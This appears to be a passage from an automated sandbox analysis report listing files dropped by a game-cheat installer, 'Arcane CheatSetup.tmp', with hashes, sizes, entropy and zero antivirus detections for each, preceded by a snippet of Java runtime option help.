                                Preview: -Xmixed mixed mode execution (default).. -Xint interpreted mode execution only.. -Xbootclasspath:<directories and zip/jar files separated by ;>.. set search path for bootstrap classes and resources.. -Xbootclasspath/a:<directories and zip/jar files separated by ;>.. append to end of bootstrap class path.. -Xbootclasspath/p:<directories and zip/jar files separated by ;>.. prepend in front of bootstrap class path.. -Xnoclassgc disable class garbage collection.. -Xincgc enable incremental garbage collection.. -Xloggc:<file> log GC status to a file with time stamps.. -Xbatch disable background compilation.. -Xms<size> set initial Java heap size.. -Xmx<size> set maximum Java heap size.. -Xss<size> set java thread stack size.. -Xprof output cpu profiling data.. -Xfuture enable strictest checks, an
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3857984
                                Entropy (8bit):6.850425436805504
                                Encrypted:false
                                SSDEEP:98304:GyXul1SNceWfkD000V3wnIACM7g6cv/GZ:Q1SgfEP0ZwnIA97dcv/GZ
                                MD5:39C302FE0781E5AF6D007E55F509606A
                                SHA1:23690A52E8C6578DE6A7980BB78AAE69D0F31780
                                SHA-256:B1FBDBB1E4C692B34D3B9F28F8188FC6105B05D311C266D59AA5E5EC531966BC
                                SHA-512:67F91A75E16C02CA245233B820DF985BD8290A2A50480DFF4B2FD2695E3CF0B4534EB1BF0D357D0B14F15CE8BD13C82D2748B5EDD9CC38DC9E713F5DC383ED77
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3857984
                                Entropy (8bit):6.850425436805504
                                Encrypted:false
                                SSDEEP:98304:GyXul1SNceWfkD000V3wnIACM7g6cv/GZ:Q1SgfEP0ZwnIA97dcv/GZ
                                MD5:39C302FE0781E5AF6D007E55F509606A
                                SHA1:23690A52E8C6578DE6A7980BB78AAE69D0F31780
                                SHA-256:B1FBDBB1E4C692B34D3B9F28F8188FC6105B05D311C266D59AA5E5EC531966BC
                                SHA-512:67F91A75E16C02CA245233B820DF985BD8290A2A50480DFF4B2FD2695E3CF0B4534EB1BF0D357D0B14F15CE8BD13C82D2748B5EDD9CC38DC9E713F5DC383ED77
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):142912
                                Entropy (8bit):7.350682736920136
                                Encrypted:false
                                SSDEEP:3072:aoGzTjLkRPQ9U9NuLqcNicj5ojGylYCE2Iu2jGLF5A9bE8LUekfCz:LGz/oRPGLJN1IGgYCE2L1F5A9bEGUeR
                                MD5:4BDC32EF5DA731393ACC1B8C052F1989
                                SHA1:A677C04ECD13F074DE68CC41F13948D3B86B6C19
                                SHA-256:A3B35CC8C2E6D22B5832AF74AAF4D1BB35069EDD73073DFFEC2595230CA81772
                                SHA-512:E71EA78D45E6C6BD08B2C5CD31F003F911FD4C82316363D26945D17977C2939F65E3B9748447006F95C3C6653CE30D2CDA67322D246D43C9EB892A8E83DEB31A
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):64064
                                Entropy (8bit):6.338192715882019
                                Encrypted:false
                                SSDEEP:1536:Skh2CQuUlng7qkKi5iO8pm8cN9qOU33oit:Skkhu0nTli5jN8cNAOUHnt
                                MD5:B04ABE76C4147DE1D726962F86473CF2
                                SHA1:3104BADA746678B0A88E5E4A77904D78A71D1AB8
                                SHA-256:07FF22E96DCFD89226E5B85CC07C34318DD32CDA23B7EA0474E09338654BFEB3
                                SHA-512:2E4E2FEB63B6D7388770D8132A880422ABF6A01941BFF12CAD74DB4A641BDA2DCC8BF58F6DAE90E41CC250B79E7956DDF126943E0F6200272F3376A9A19505F1
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):453184
                                Entropy (8bit):6.516599034237354
                                Encrypted:false
                                SSDEEP:6144:3J/sbugq7rm5zX2JDYfiA9+wvpsEWcIGnFm8iTFOBITfnvxIW1x8:3JUbzq+5zX25qvdfnFm88nvq+x8
                                MD5:5EDAEFFC60B5F1147068E4A296F6D7FB
                                SHA1:7D36698C62386449A5FA2607886F4ADF7FB3DEEF
                                SHA-256:87847204933551F69F1CBA7A73B63A252D12EF106C22ED9C561EF188DFFCBAE8
                                SHA-512:A691EF121D3AC17569E27BB6DE4688D3506895B1A1A8740E1F16E80EEFCE70BA18B9C1EFD6FD6794FAFC59BA2CAF137B4007FCDC65DDB8BCBFCF42C97B13535B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):25152
                                Entropy (8bit):6.627329311560644
                                Encrypted:false
                                SSDEEP:384:0mgNWEfK0RiC4qxJL8VI6ZEPG5Vv/11nYPLr7N:H6WmK0RiSxJ4VI6W+zbC7N
                                MD5:72B7054811A72D9D48C95845F93FCD2C
                                SHA1:D25F68566E11B91C2A0989BCC64C6EF17395D775
                                SHA-256:D4B63243D1787809020BA6E91564D17FFEA4762AF99201E241F4ECD20108D2E8
                                SHA-512:C6A16DAAF856939615DFDE8E9DBE9D5BFC415507011E85E44C6BF88B17B705C35CD7CED8EDA8F358745063F41096938D128DEE17E14FE93252E5B046BDFCDDC0
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):21568
                                Entropy (8bit):6.601333059222365
                                Encrypted:false
                                SSDEEP:384:QwiAYZIxsQbbRLEs5Ltd7rpPVJfq0nYPLr7Ko+:BiPZj+bVEmtd7rpdJfnC7J+
                                MD5:73603BF0DC85CAA2F4C4A38B9806EC82
                                SHA1:74EBC4F158936842840973F54AF50CDF46BC9096
                                SHA-256:39EF85AB21F653993C8AAAB2A487E8909D6401A21F27CBA09283B46556FB16AF
                                SHA-512:5C238D677D458D5B7D43FA3FF424E13B62ABFCEDE66D55E3112DC09BF2F7B640EB8F82D00E41A2C7A7E7B36E3FCE3C2DCB060037314418D329466CC462D0BF71
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):827456
                                Entropy (8bit):6.022966185458799
                                Encrypted:false
                                SSDEEP:24576:E0NweWDjb28WNjE/lBy/pUbS3lYMpQIRrAOh3:7Wb5By/pUbouAQIRHh3
                                MD5:E741028613B1FC49EC5A899BE6E3FC34
                                SHA1:9EAE3D3CA22E92A925395A660B55CECB2EB62D54
                                SHA-256:9163A546696E581D443B3A6250F61E5368BE984C69ADFB54EE2B0E51D0FA008E
                                SHA-512:05C6CE707F4F0F415E74D32F1AACEC7E2C7746C3D04C75502EAECAFAF9E0108CE6206A8A3939C92EDCE449FFC0A68FB4389EDAA93D61920D1EC85327D1B3A55A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):907328
                                Entropy (8bit):6.160830535423145
                                Encrypted:false
                                SSDEEP:24576:ZyWOeRjqm9ZRI+Ga+fme7CV93+x6FQ3ge:VRAeMme7kA6F6ge
                                MD5:4FD3548990CAF9771B688532DEF5DE48
                                SHA1:567C27A4EA16775085D8E87A38FE58BEC4463F7D
                                SHA-256:BDE5DF7BCFC35270B57A8982949BF5F25592A2E560A04E9868B84BEF83A0EA4B
                                SHA-512:FD2CF2072A786293E30CD495BA06F4734F0CEA63CBC49B6D7A24F6891612375E48D1B5758D9408625E769E8A81C7C34F04278E011BCF47EDEB8C2AFC13AEC20C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):827456
                                Entropy (8bit):6.022966185458799
                                Encrypted:false
                                SSDEEP:24576:E0NweWDjb28WNjE/lBy/pUbS3lYMpQIRrAOh3:7Wb5By/pUbouAQIRHh3
                                MD5:E741028613B1FC49EC5A899BE6E3FC34
                                SHA1:9EAE3D3CA22E92A925395A660B55CECB2EB62D54
                                SHA-256:9163A546696E581D443B3A6250F61E5368BE984C69ADFB54EE2B0E51D0FA008E
                                SHA-512:05C6CE707F4F0F415E74D32F1AACEC7E2C7746C3D04C75502EAECAFAF9E0108CE6206A8A3939C92EDCE449FFC0A68FB4389EDAA93D61920D1EC85327D1B3A55A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):109120
                                Entropy (8bit):5.986571003903383
                                Encrypted:false
                                SSDEEP:1536:LE9WcstxlDgZ9EYDKg0nc6N3MR+EpOB+o+5PVT/B:ghspgZPDanhs+EpOBF+5PFB
                                MD5:A5455B9BEB5672D89B1F0FCFAA4C79CA
                                SHA1:9C7DBB5AD1CB3EBE7347A9CDDD80389902DA81EC
                                SHA-256:89A429889DCD0F6A3FE56217A0FEB5912132AAB2817643021EAE3716DA533D4A
                                SHA-512:131866A4754F4AF78A94F0776815E7EA4375736A4B11A723B87A4436FA101D271FFE14E4B49D3AB1AE2FA61CDBDED0C3D174C75327BE3C24E0E4CC39AFFA9469
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):223296
                                Entropy (8bit):6.501845596055873
                                Encrypted:false
                                SSDEEP:6144:8P8OC0xbNXLJAEh4hijzud6kAgZkFGMReiDfbgOBI1:8P8OC0xbNXLJAEh4hijzud6kAgYGSA
                                MD5:9D5EDECF7E33DDD0E2A6A0D34FC12CA1
                                SHA1:FC228A80FF85D78AA5BFBA2515EFED3257B9B009
                                SHA-256:6D817519C2E2EFDD3986EB655C1F687D4774730AB20768DF1C0AAEF03B110965
                                SHA-512:B4D58D3415D0255DCD87EF413762BC0F2934AAA6C8151344266949D3DD549ABDCA1366FA751A988CDDC1430EBF5D17668ADF02096DD4D5EAFE75604C0DA0B4C9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):151104
                                Entropy (8bit):6.548096027649263
                                Encrypted:false
                                SSDEEP:3072:PPuiQNBInyjJ2y53/5d8n9e/ry7zOAHpyWWJd1u2TeKSNlGFGZQfVN2:iBInu2y5P5dkeDy7zOUpLJ2mHZQf2
                                MD5:7A710F90A74981C2F060FA361D094822
                                SHA1:FBDCA4E3F19AD5201572974E3C772A3C2694FBB3
                                SHA-256:9BC52058C02E0C87A6A9470C62D1AA4F998942CC00F99A82E7805E87D958BC16
                                SHA-512:928708DFF6A372BA997C072238823469CBFD28CCBB17A723AD35F851D35C6EFF82748AA41A9215955B9536A14AA57D47ABE0F1BA00D11F8D920A57F91B7A35E5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):200768
                                Entropy (8bit):6.431501859060678
                                Encrypted:false
                                SSDEEP:3072:lC0MaRHVsSduCCkNlKpR1FHNnuNcCwJPT54l2B3Fzkmldrz5ZD9hYJOj9T3iRK:s0XR1sYtxgGl2B3uWjhYJOj9TSY
                                MD5:434CBB561D7F326BBEFFA2271ECC1446
                                SHA1:3D9639F6DA2BC8AC5A536C150474B659D0177207
                                SHA-256:1EDD9022C10C27BBBA2AD843310458EDAEAD37A9767C6FC8FDDAAF1ADFCBC143
                                SHA-512:9E37B985ECF0B2FEF262F183C1CD26D437C8C7BE97AA4EC4CD8C75C044336CC69A56A4614EA6D33DC252FE0DA8E1BBADC193FF61B87BE5DCE6610525F321B6DC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):400960
                                Entropy (8bit):6.165546757090391
                                Encrypted:false
                                SSDEEP:6144:vxDvEpBGH7t7PB7Es7va/QdqOBYswIprNWhk+URpxfu4w7J:tvEpBGH7pN57vwQd6swIp5WhkRlfu4CJ
                                MD5:767BBA46789597B120D01E48A685811E
                                SHA1:D2052953DDE6002D590D0D89C2A052195364410A
                                SHA-256:218D349986E2A0CD4A76F665434F455A8D452F1B27EAF9D01A120CB35DA13694
                                SHA-512:86F7F7E87514DBC62C284083D66D5F250A24FC5CD7540AF573C3FB9D47B802BE5FFBBC709B638F8E066AB6E4BB396320F6E65A8016415366799C74772398B530
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):514112
                                Entropy (8bit):6.805344203686025
                                Encrypted:false
                                SSDEEP:12288:Y5JbfdT5NYGe8m51QSWvopH1kdMDbA2ZoNnYX:Y5JV7eB3KopvnAe2YX
                                MD5:8D0CE7151635322F1FE71A8CEA22A7D6
                                SHA1:81E526D3BD968A57AF430ABB5F55A5C55166E579
                                SHA-256:43C2AC74004F307117D80EE44D6D94DB2205C802AE6F57764810DEE17CFC914D
                                SHA-512:3C78C0249B06A798106FEAF796AA61D3A849F379BD438BF0BB7BFED0DC9B7E7EA7DE689BC3874ED8B97FF2B3BA40265DED251896E03643B696EFDBF2E01AC88C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):132672
                                Entropy (8bit):6.708436670828807
                                Encrypted:false
                                SSDEEP:3072:HGBc2vf2AWlvx+Kre9vVv3CoLORljxWEXyB/NK3GyNf9:mxvffVvyo0X8NKW+1
                                MD5:6376B76728E4A873B2BB7233CBCD5659
                                SHA1:3BE08074527D5B5BC4A1DDCEC41375E3B3A8A615
                                SHA-256:4FDF86D78ABC66B44B8AFF4BBCE1F2A5D6D9900767BE3CAAE450409924DBC5AD
                                SHA-512:955E7C5AB735183B491A753710B6F598A142A2876DDAE5AD301C3DA82A65CE82238E0F20C9F558F80138D58F8DC00B4EBD21483CEED0AABEEDA32CCA5D2E3D48
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115776
                                Entropy (8bit):6.787384437276838
                                Encrypted:false
                                SSDEEP:1536:0LHPDcdivqC4xMfl/hAxfZ/t0QHQIM7iVxoQCpGlyir0wIOfnToIfemrVZQirM:0rPDco4xMNEfZ1LQG4igmvTBfem7QcM
                                MD5:AB6ED0CFD0C52DBEDE1BE910EFA8A89B
                                SHA1:83CBC2746A50C155261407ECE3D7A5C58AAD0437
                                SHA-256:8A6FBB08E0F418A3BB80CC65233E7270C820741DD57525ED7FD3CC479A49396E
                                SHA-512:41773183FC20E42BF208064163AA55658692B9221560146E4F6A676F96FC76541ED82F1EFDFA31F8C25BA42F271F7D9087DE681DA937BBF0EB2C781E027F1218
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):27712
                                Entropy (8bit):6.6264206752006825
                                Encrypted:false
                                SSDEEP:768:hgWe1DWI+mB7JkJKe3xVF2XNbuHEqe8yIGn3zY9pcQ/oGmEsg0sqkgiHmNs2Qd6X:qWbEK1Ms2dYJG
                                MD5:6280201C1918EA3293919BB282D2B563
                                SHA1:3F6F5299A435E2A0C36BE8AAD4CB2FCAACD0897D
                                SHA-256:0711127A297E4CC1927D77013FC040CAA26930C34A4C7B4D7631BCE9C8041B74
                                SHA-512:A4C4507ED4FDEC038FAFA62970161E7B75FF9A2ABBDF854ED55483144DCDC0FC9D21235FDDDF1B38303723F9C615AE388397C4D17B5391D8827A5B40AC52C5FC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):970912
                                Entropy (8bit):6.9649735952029515
                                Encrypted:false
                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                MD5:034CCADC1C073E4216E9466B720F9849
                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):177216
                                Entropy (8bit):6.909590121652277
                                Encrypted:false
                                SSDEEP:3072:L9Wyo+Jyru3w8WqWnJjOUrI7vh+Dug9PVWU+kmaVE9TBfQiJ8:BWyPsi34i+DugFj+kmaVE9TB4/
                                MD5:8DC2356E3FF3A595AEDE81594A2D259A
                                SHA1:A05E05E9EA8FB0C8928112CA931EB4F5E977B92A
                                SHA-256:B9DE5D3ABBC0AC956E7F590E4C8507FF570B6C353374BB80F413B5846CE322FE
                                SHA-512:D5C83EBDB7192DD361856B236A07AFD4FF95E68E0036396D68A3407ED680D4A36EC857AB101DBA5F583AA67CC45A2835178DAC84A68472C7F619EFA674FE51F0
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):82496
                                Entropy (8bit):6.597347722250847
                                Encrypted:false
                                SSDEEP:1536:ez2dfBusTTkMffX+xR5kdt94u+508AqDfJOqsbCkq24maADX:kE5u+kkX+P+dt9O08JJOZXX4nADX
                                MD5:5F85F7F2DFAC397D642834B61809240F
                                SHA1:ECA28E8464208FA11EF7DF677B741CDD561483D9
                                SHA-256:B71E00ADB77D87882D58993A5888955BDD62C57D364F60AAA0FA19D32A69C9DA
                                SHA-512:2BFE9FCE450E57EA93DEEAA85A746CB17BA946EEFF866F10D67C74F7EA038B16910E0D8EF29E9F358AF7DAABD45E3983C370FEF82A9647546819DCDE3AEE45BC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.783788147675078
                                Encrypted:false
                                SSDEEP:3072:XrQPwE5tlGsXVomHvD+1febSICzqozXtrQwnNZkB+5:XU15tpX9HvsfrTtMwNWBY
                                MD5:6E08D65F5CBB85E51010F36A84FC181D
                                SHA1:4EEE8BE68BAAF6320AEA29131A1C0B322F09F087
                                SHA-256:2D8658909D9E357A4B70FCF862D690EEC82A2F77161ABB021E0839C6A67D4825
                                SHA-512:DF4494D062E9A8AC82D727D2722DCF32C3FC924FA104F384FA099ADB08ECBDEEA7A19245D779097C0AFCF51F84852328ED595C88380F42BD39560678C8AD9621
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):178240
                                Entropy (8bit):6.793245389378621
                                Encrypted:false
                                SSDEEP:3072:gWosiKTxga2KtpdhEnGF5PNyR0BxDxxKF5HkEWnuYsauj9Fom1QB:3RRKAtpdhEn/0BzwFpvYm0z
                                MD5:BF299F73480AF97A750492E043D1FADD
                                SHA1:C93C4A2DAE812F31603E42D70711D3B6822F9E8E
                                SHA-256:0334E3B7AE677116B92516172D0CA905723DAF847D8B3B0DC3FC118EDC703D51
                                SHA-512:7265783F0DD653DBC4693D5EFEB156281620C5421F29910F14C22B75A936233E9E897087E64B641335795484837F28F113EE9F380027698A898F19115FD0F648
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.367562931371078
                                Encrypted:false
                                SSDEEP:768:0UD9dxWf4b4UoY6sUsaJ2sQ7O+phclByW3T9KMDbgz2dN6lDb/9/YMw0c3D6QsTY:0IofovBbS9KMvHR0cz6QsTPOXm2BT9j7
                                MD5:F434A8AC7F1C8C0E2587B9A9F30E397B
                                SHA1:BD62E10E44117A60EB4180412112593D9460299D
                                SHA-256:6A994B389B8F7109238DE6F230B1B540186ED2EC8D081C7601C6996863AA4DC8
                                SHA-512:9896DAC36BD4F7289C7701B75AD8EB9F7ACD233384075A3FBA6E6F2F38E420F37C1A29317EEEA3C4DDBA1791F6F17187DD5BDFDD9F98F095E7D4DF20C0D5EA3E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466364086630595
                                Encrypted:false
                                SSDEEP:384:Gpss5cnn6vmSHhV8TI1ee84SzK8nYPLr7HuY:Gps7nnS/8Tte8tC7HuY
                                MD5:12B6E1C3205A8B17AC20E00A889DFC43
                                SHA1:42458CFA7135858ACEF10803B87A208FA7E66413
                                SHA-256:EAEA20A794EC6BB15808EF278376A87CF91F9BE15FE6A7DE92014AC4BF75555D
                                SHA-512:174703820636DED2BA081420A8D1E37D67FDA6C13AC406C2F08E16DCF0C7B7D9642E37BC888802B50ED3438D6029C4FECCD7C151B82CF9A91F13F36C4A0B2019
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.476844183458217
                                Encrypted:false
                                SSDEEP:384:Gpsw5cnL6U0mSHhV89+ee84SzSFnYPLr7KTdK:Gps/nHpS/89je80C7KQ
                                MD5:B4AD335E868693F009B7644E2ED555C1
                                SHA1:ECCB9711CF78BCD5BD78231A838B1852764B301C
                                SHA-256:CCA46A54A1A9CE78F7FFC49D195C4AB970AD540B5FCB2B6D9BF57EEDF38EC28D
                                SHA-512:04A4670345B47C5B256220A85FFC68A1DD6DFE8D44838A4C634EB0EBC469EFC307B0BCF838AA1244634A315F365518B1633586B872C6D459EE80374D14234CA4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):57408
                                Entropy (8bit):6.6711491011490285
                                Encrypted:false
                                SSDEEP:1536:f6arRmcnq2lxm+Na6C7HIT6T8E2pLSSm3:fzm+q7HITS8E2pLSSA
                                MD5:AEADA06201BB8F5416D5F934AAA29C87
                                SHA1:35BB59FEBE946FB869E5DA6500AB3C32985D3930
                                SHA-256:F8F0B1E283FD94BD87ABCA162E41AFB36DA219386B87B0F6A7E880E99073BDA3
                                SHA-512:89BAD9D1115D030B98E49469275872FFF52D8E394FE3F240282696CF31BCCF0B87FF5A0E9A697A05BEFCFE9B24772D65ED73C5DBD168EED111700CAAD5808A78
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466457942735197
                                Encrypted:false
                                SSDEEP:384:GpsbHnDiW6gejmSHhV8cGees7snYPLr7Wj53:GpsbHn/HS/8cresgC743
                                MD5:CF2F023D2B5F0BFB2ECF8AEEA7C51481
                                SHA1:6EB867B1AC656A0FC363DFAE4E2D582606D100FB
                                SHA-256:355366D0C7D7406E2319C90DF2080C0FAE72D9D54E4563C48A09F55CA68D6B0C
                                SHA-512:A2041925039238235ADC5FE8A9B818DFF577C6EA3C55A0DE08DA3DEDD8CD50DC240432BA1A0AEA5E8830DCDCCD3BFBF9CF8A4F21E9B56DC839E074E156FC008D
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.380289288441742
                                Encrypted:false
                                SSDEEP:384:GpsCgvnvId6YmSHhV85AeencGtnYPLr7Vz:GpsDngGS/851ebC7Vz
                                MD5:7DA6AA3CC4763C6F9C20B43E6C9A9547
                                SHA1:3F28CF8E6AAD199DCC621F2A2C8AD50126813B05
                                SHA-256:F7375AD07F0BE6FD75E822A9ECFF5ACA073DB03B95894C05C7657BEC7AF59AF4
                                SHA-512:7948EAA11B4026F9975B6CC4225A4C0B617341299364196F3825EEF4484A6EEB529319BF4F6D19436689083C36BF1F6B9880574764612FC900C8CC1D73EED1BB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1182272
                                Entropy (8bit):6.63089480914076
                                Encrypted:false
                                SSDEEP:24576:68M4H6ioDs5FELnSbY6Ck2IlAnVCXQlFg3:9eaGnkXQlFQ
                                MD5:159CCF1200C422CED5407FED35F7E37D
                                SHA1:177A216B71C9902E254C0A9908FCB46E8D5801A9
                                SHA-256:30EB581C99C8BCBC54012AA5E6084B6EF4FCEE5D9968E9CC51F5734449E1FF49
                                SHA-512:AB3F4E3851313391B5B8055E4D526963C38C4403FA74FB70750CC6A2D5108E63A0E600978FA14A7201C48E1AFD718A1C6823D091C90D77B17562B7A4C8C40365
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):207424
                                Entropy (8bit):6.630800216665857
                                Encrypted:false
                                SSDEEP:6144:ckZ5ktGCru8e6Y3RhNw0mjs+OBS7n7ACKRAHbW:ciIbS6Y37Nw0/QC
                                MD5:475DD87198F9C48EFB08AAB4ADE8AF5A
                                SHA1:9B657E0837639663D4D721F8C5E25401F11E7BEB
                                SHA-256:32764005FCCE7D0E51801528F6B68C860979E08D027A5220DFEC19B2A8013354
                                SHA-512:0B492B0FBADC14178A6F79A58E47C30D92B59B18414E38A7B119699D0788ACF3713F925CF0EC570BE3E29AB26BDB6B567C38526BC0603BA78ECC3E2952EA3E2B
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):23616
                                Entropy (8bit):6.620094371728742
                                Encrypted:false
                                SSDEEP:384:Qp2dG5pC/ujTc8ZrEnrZm8WXLFnPV52WZQAnYPLr7lOGa:uvCGjJ0Q9ndRZdC71a
                                MD5:1C47DD47EBD106C9E2279C7FCB576833
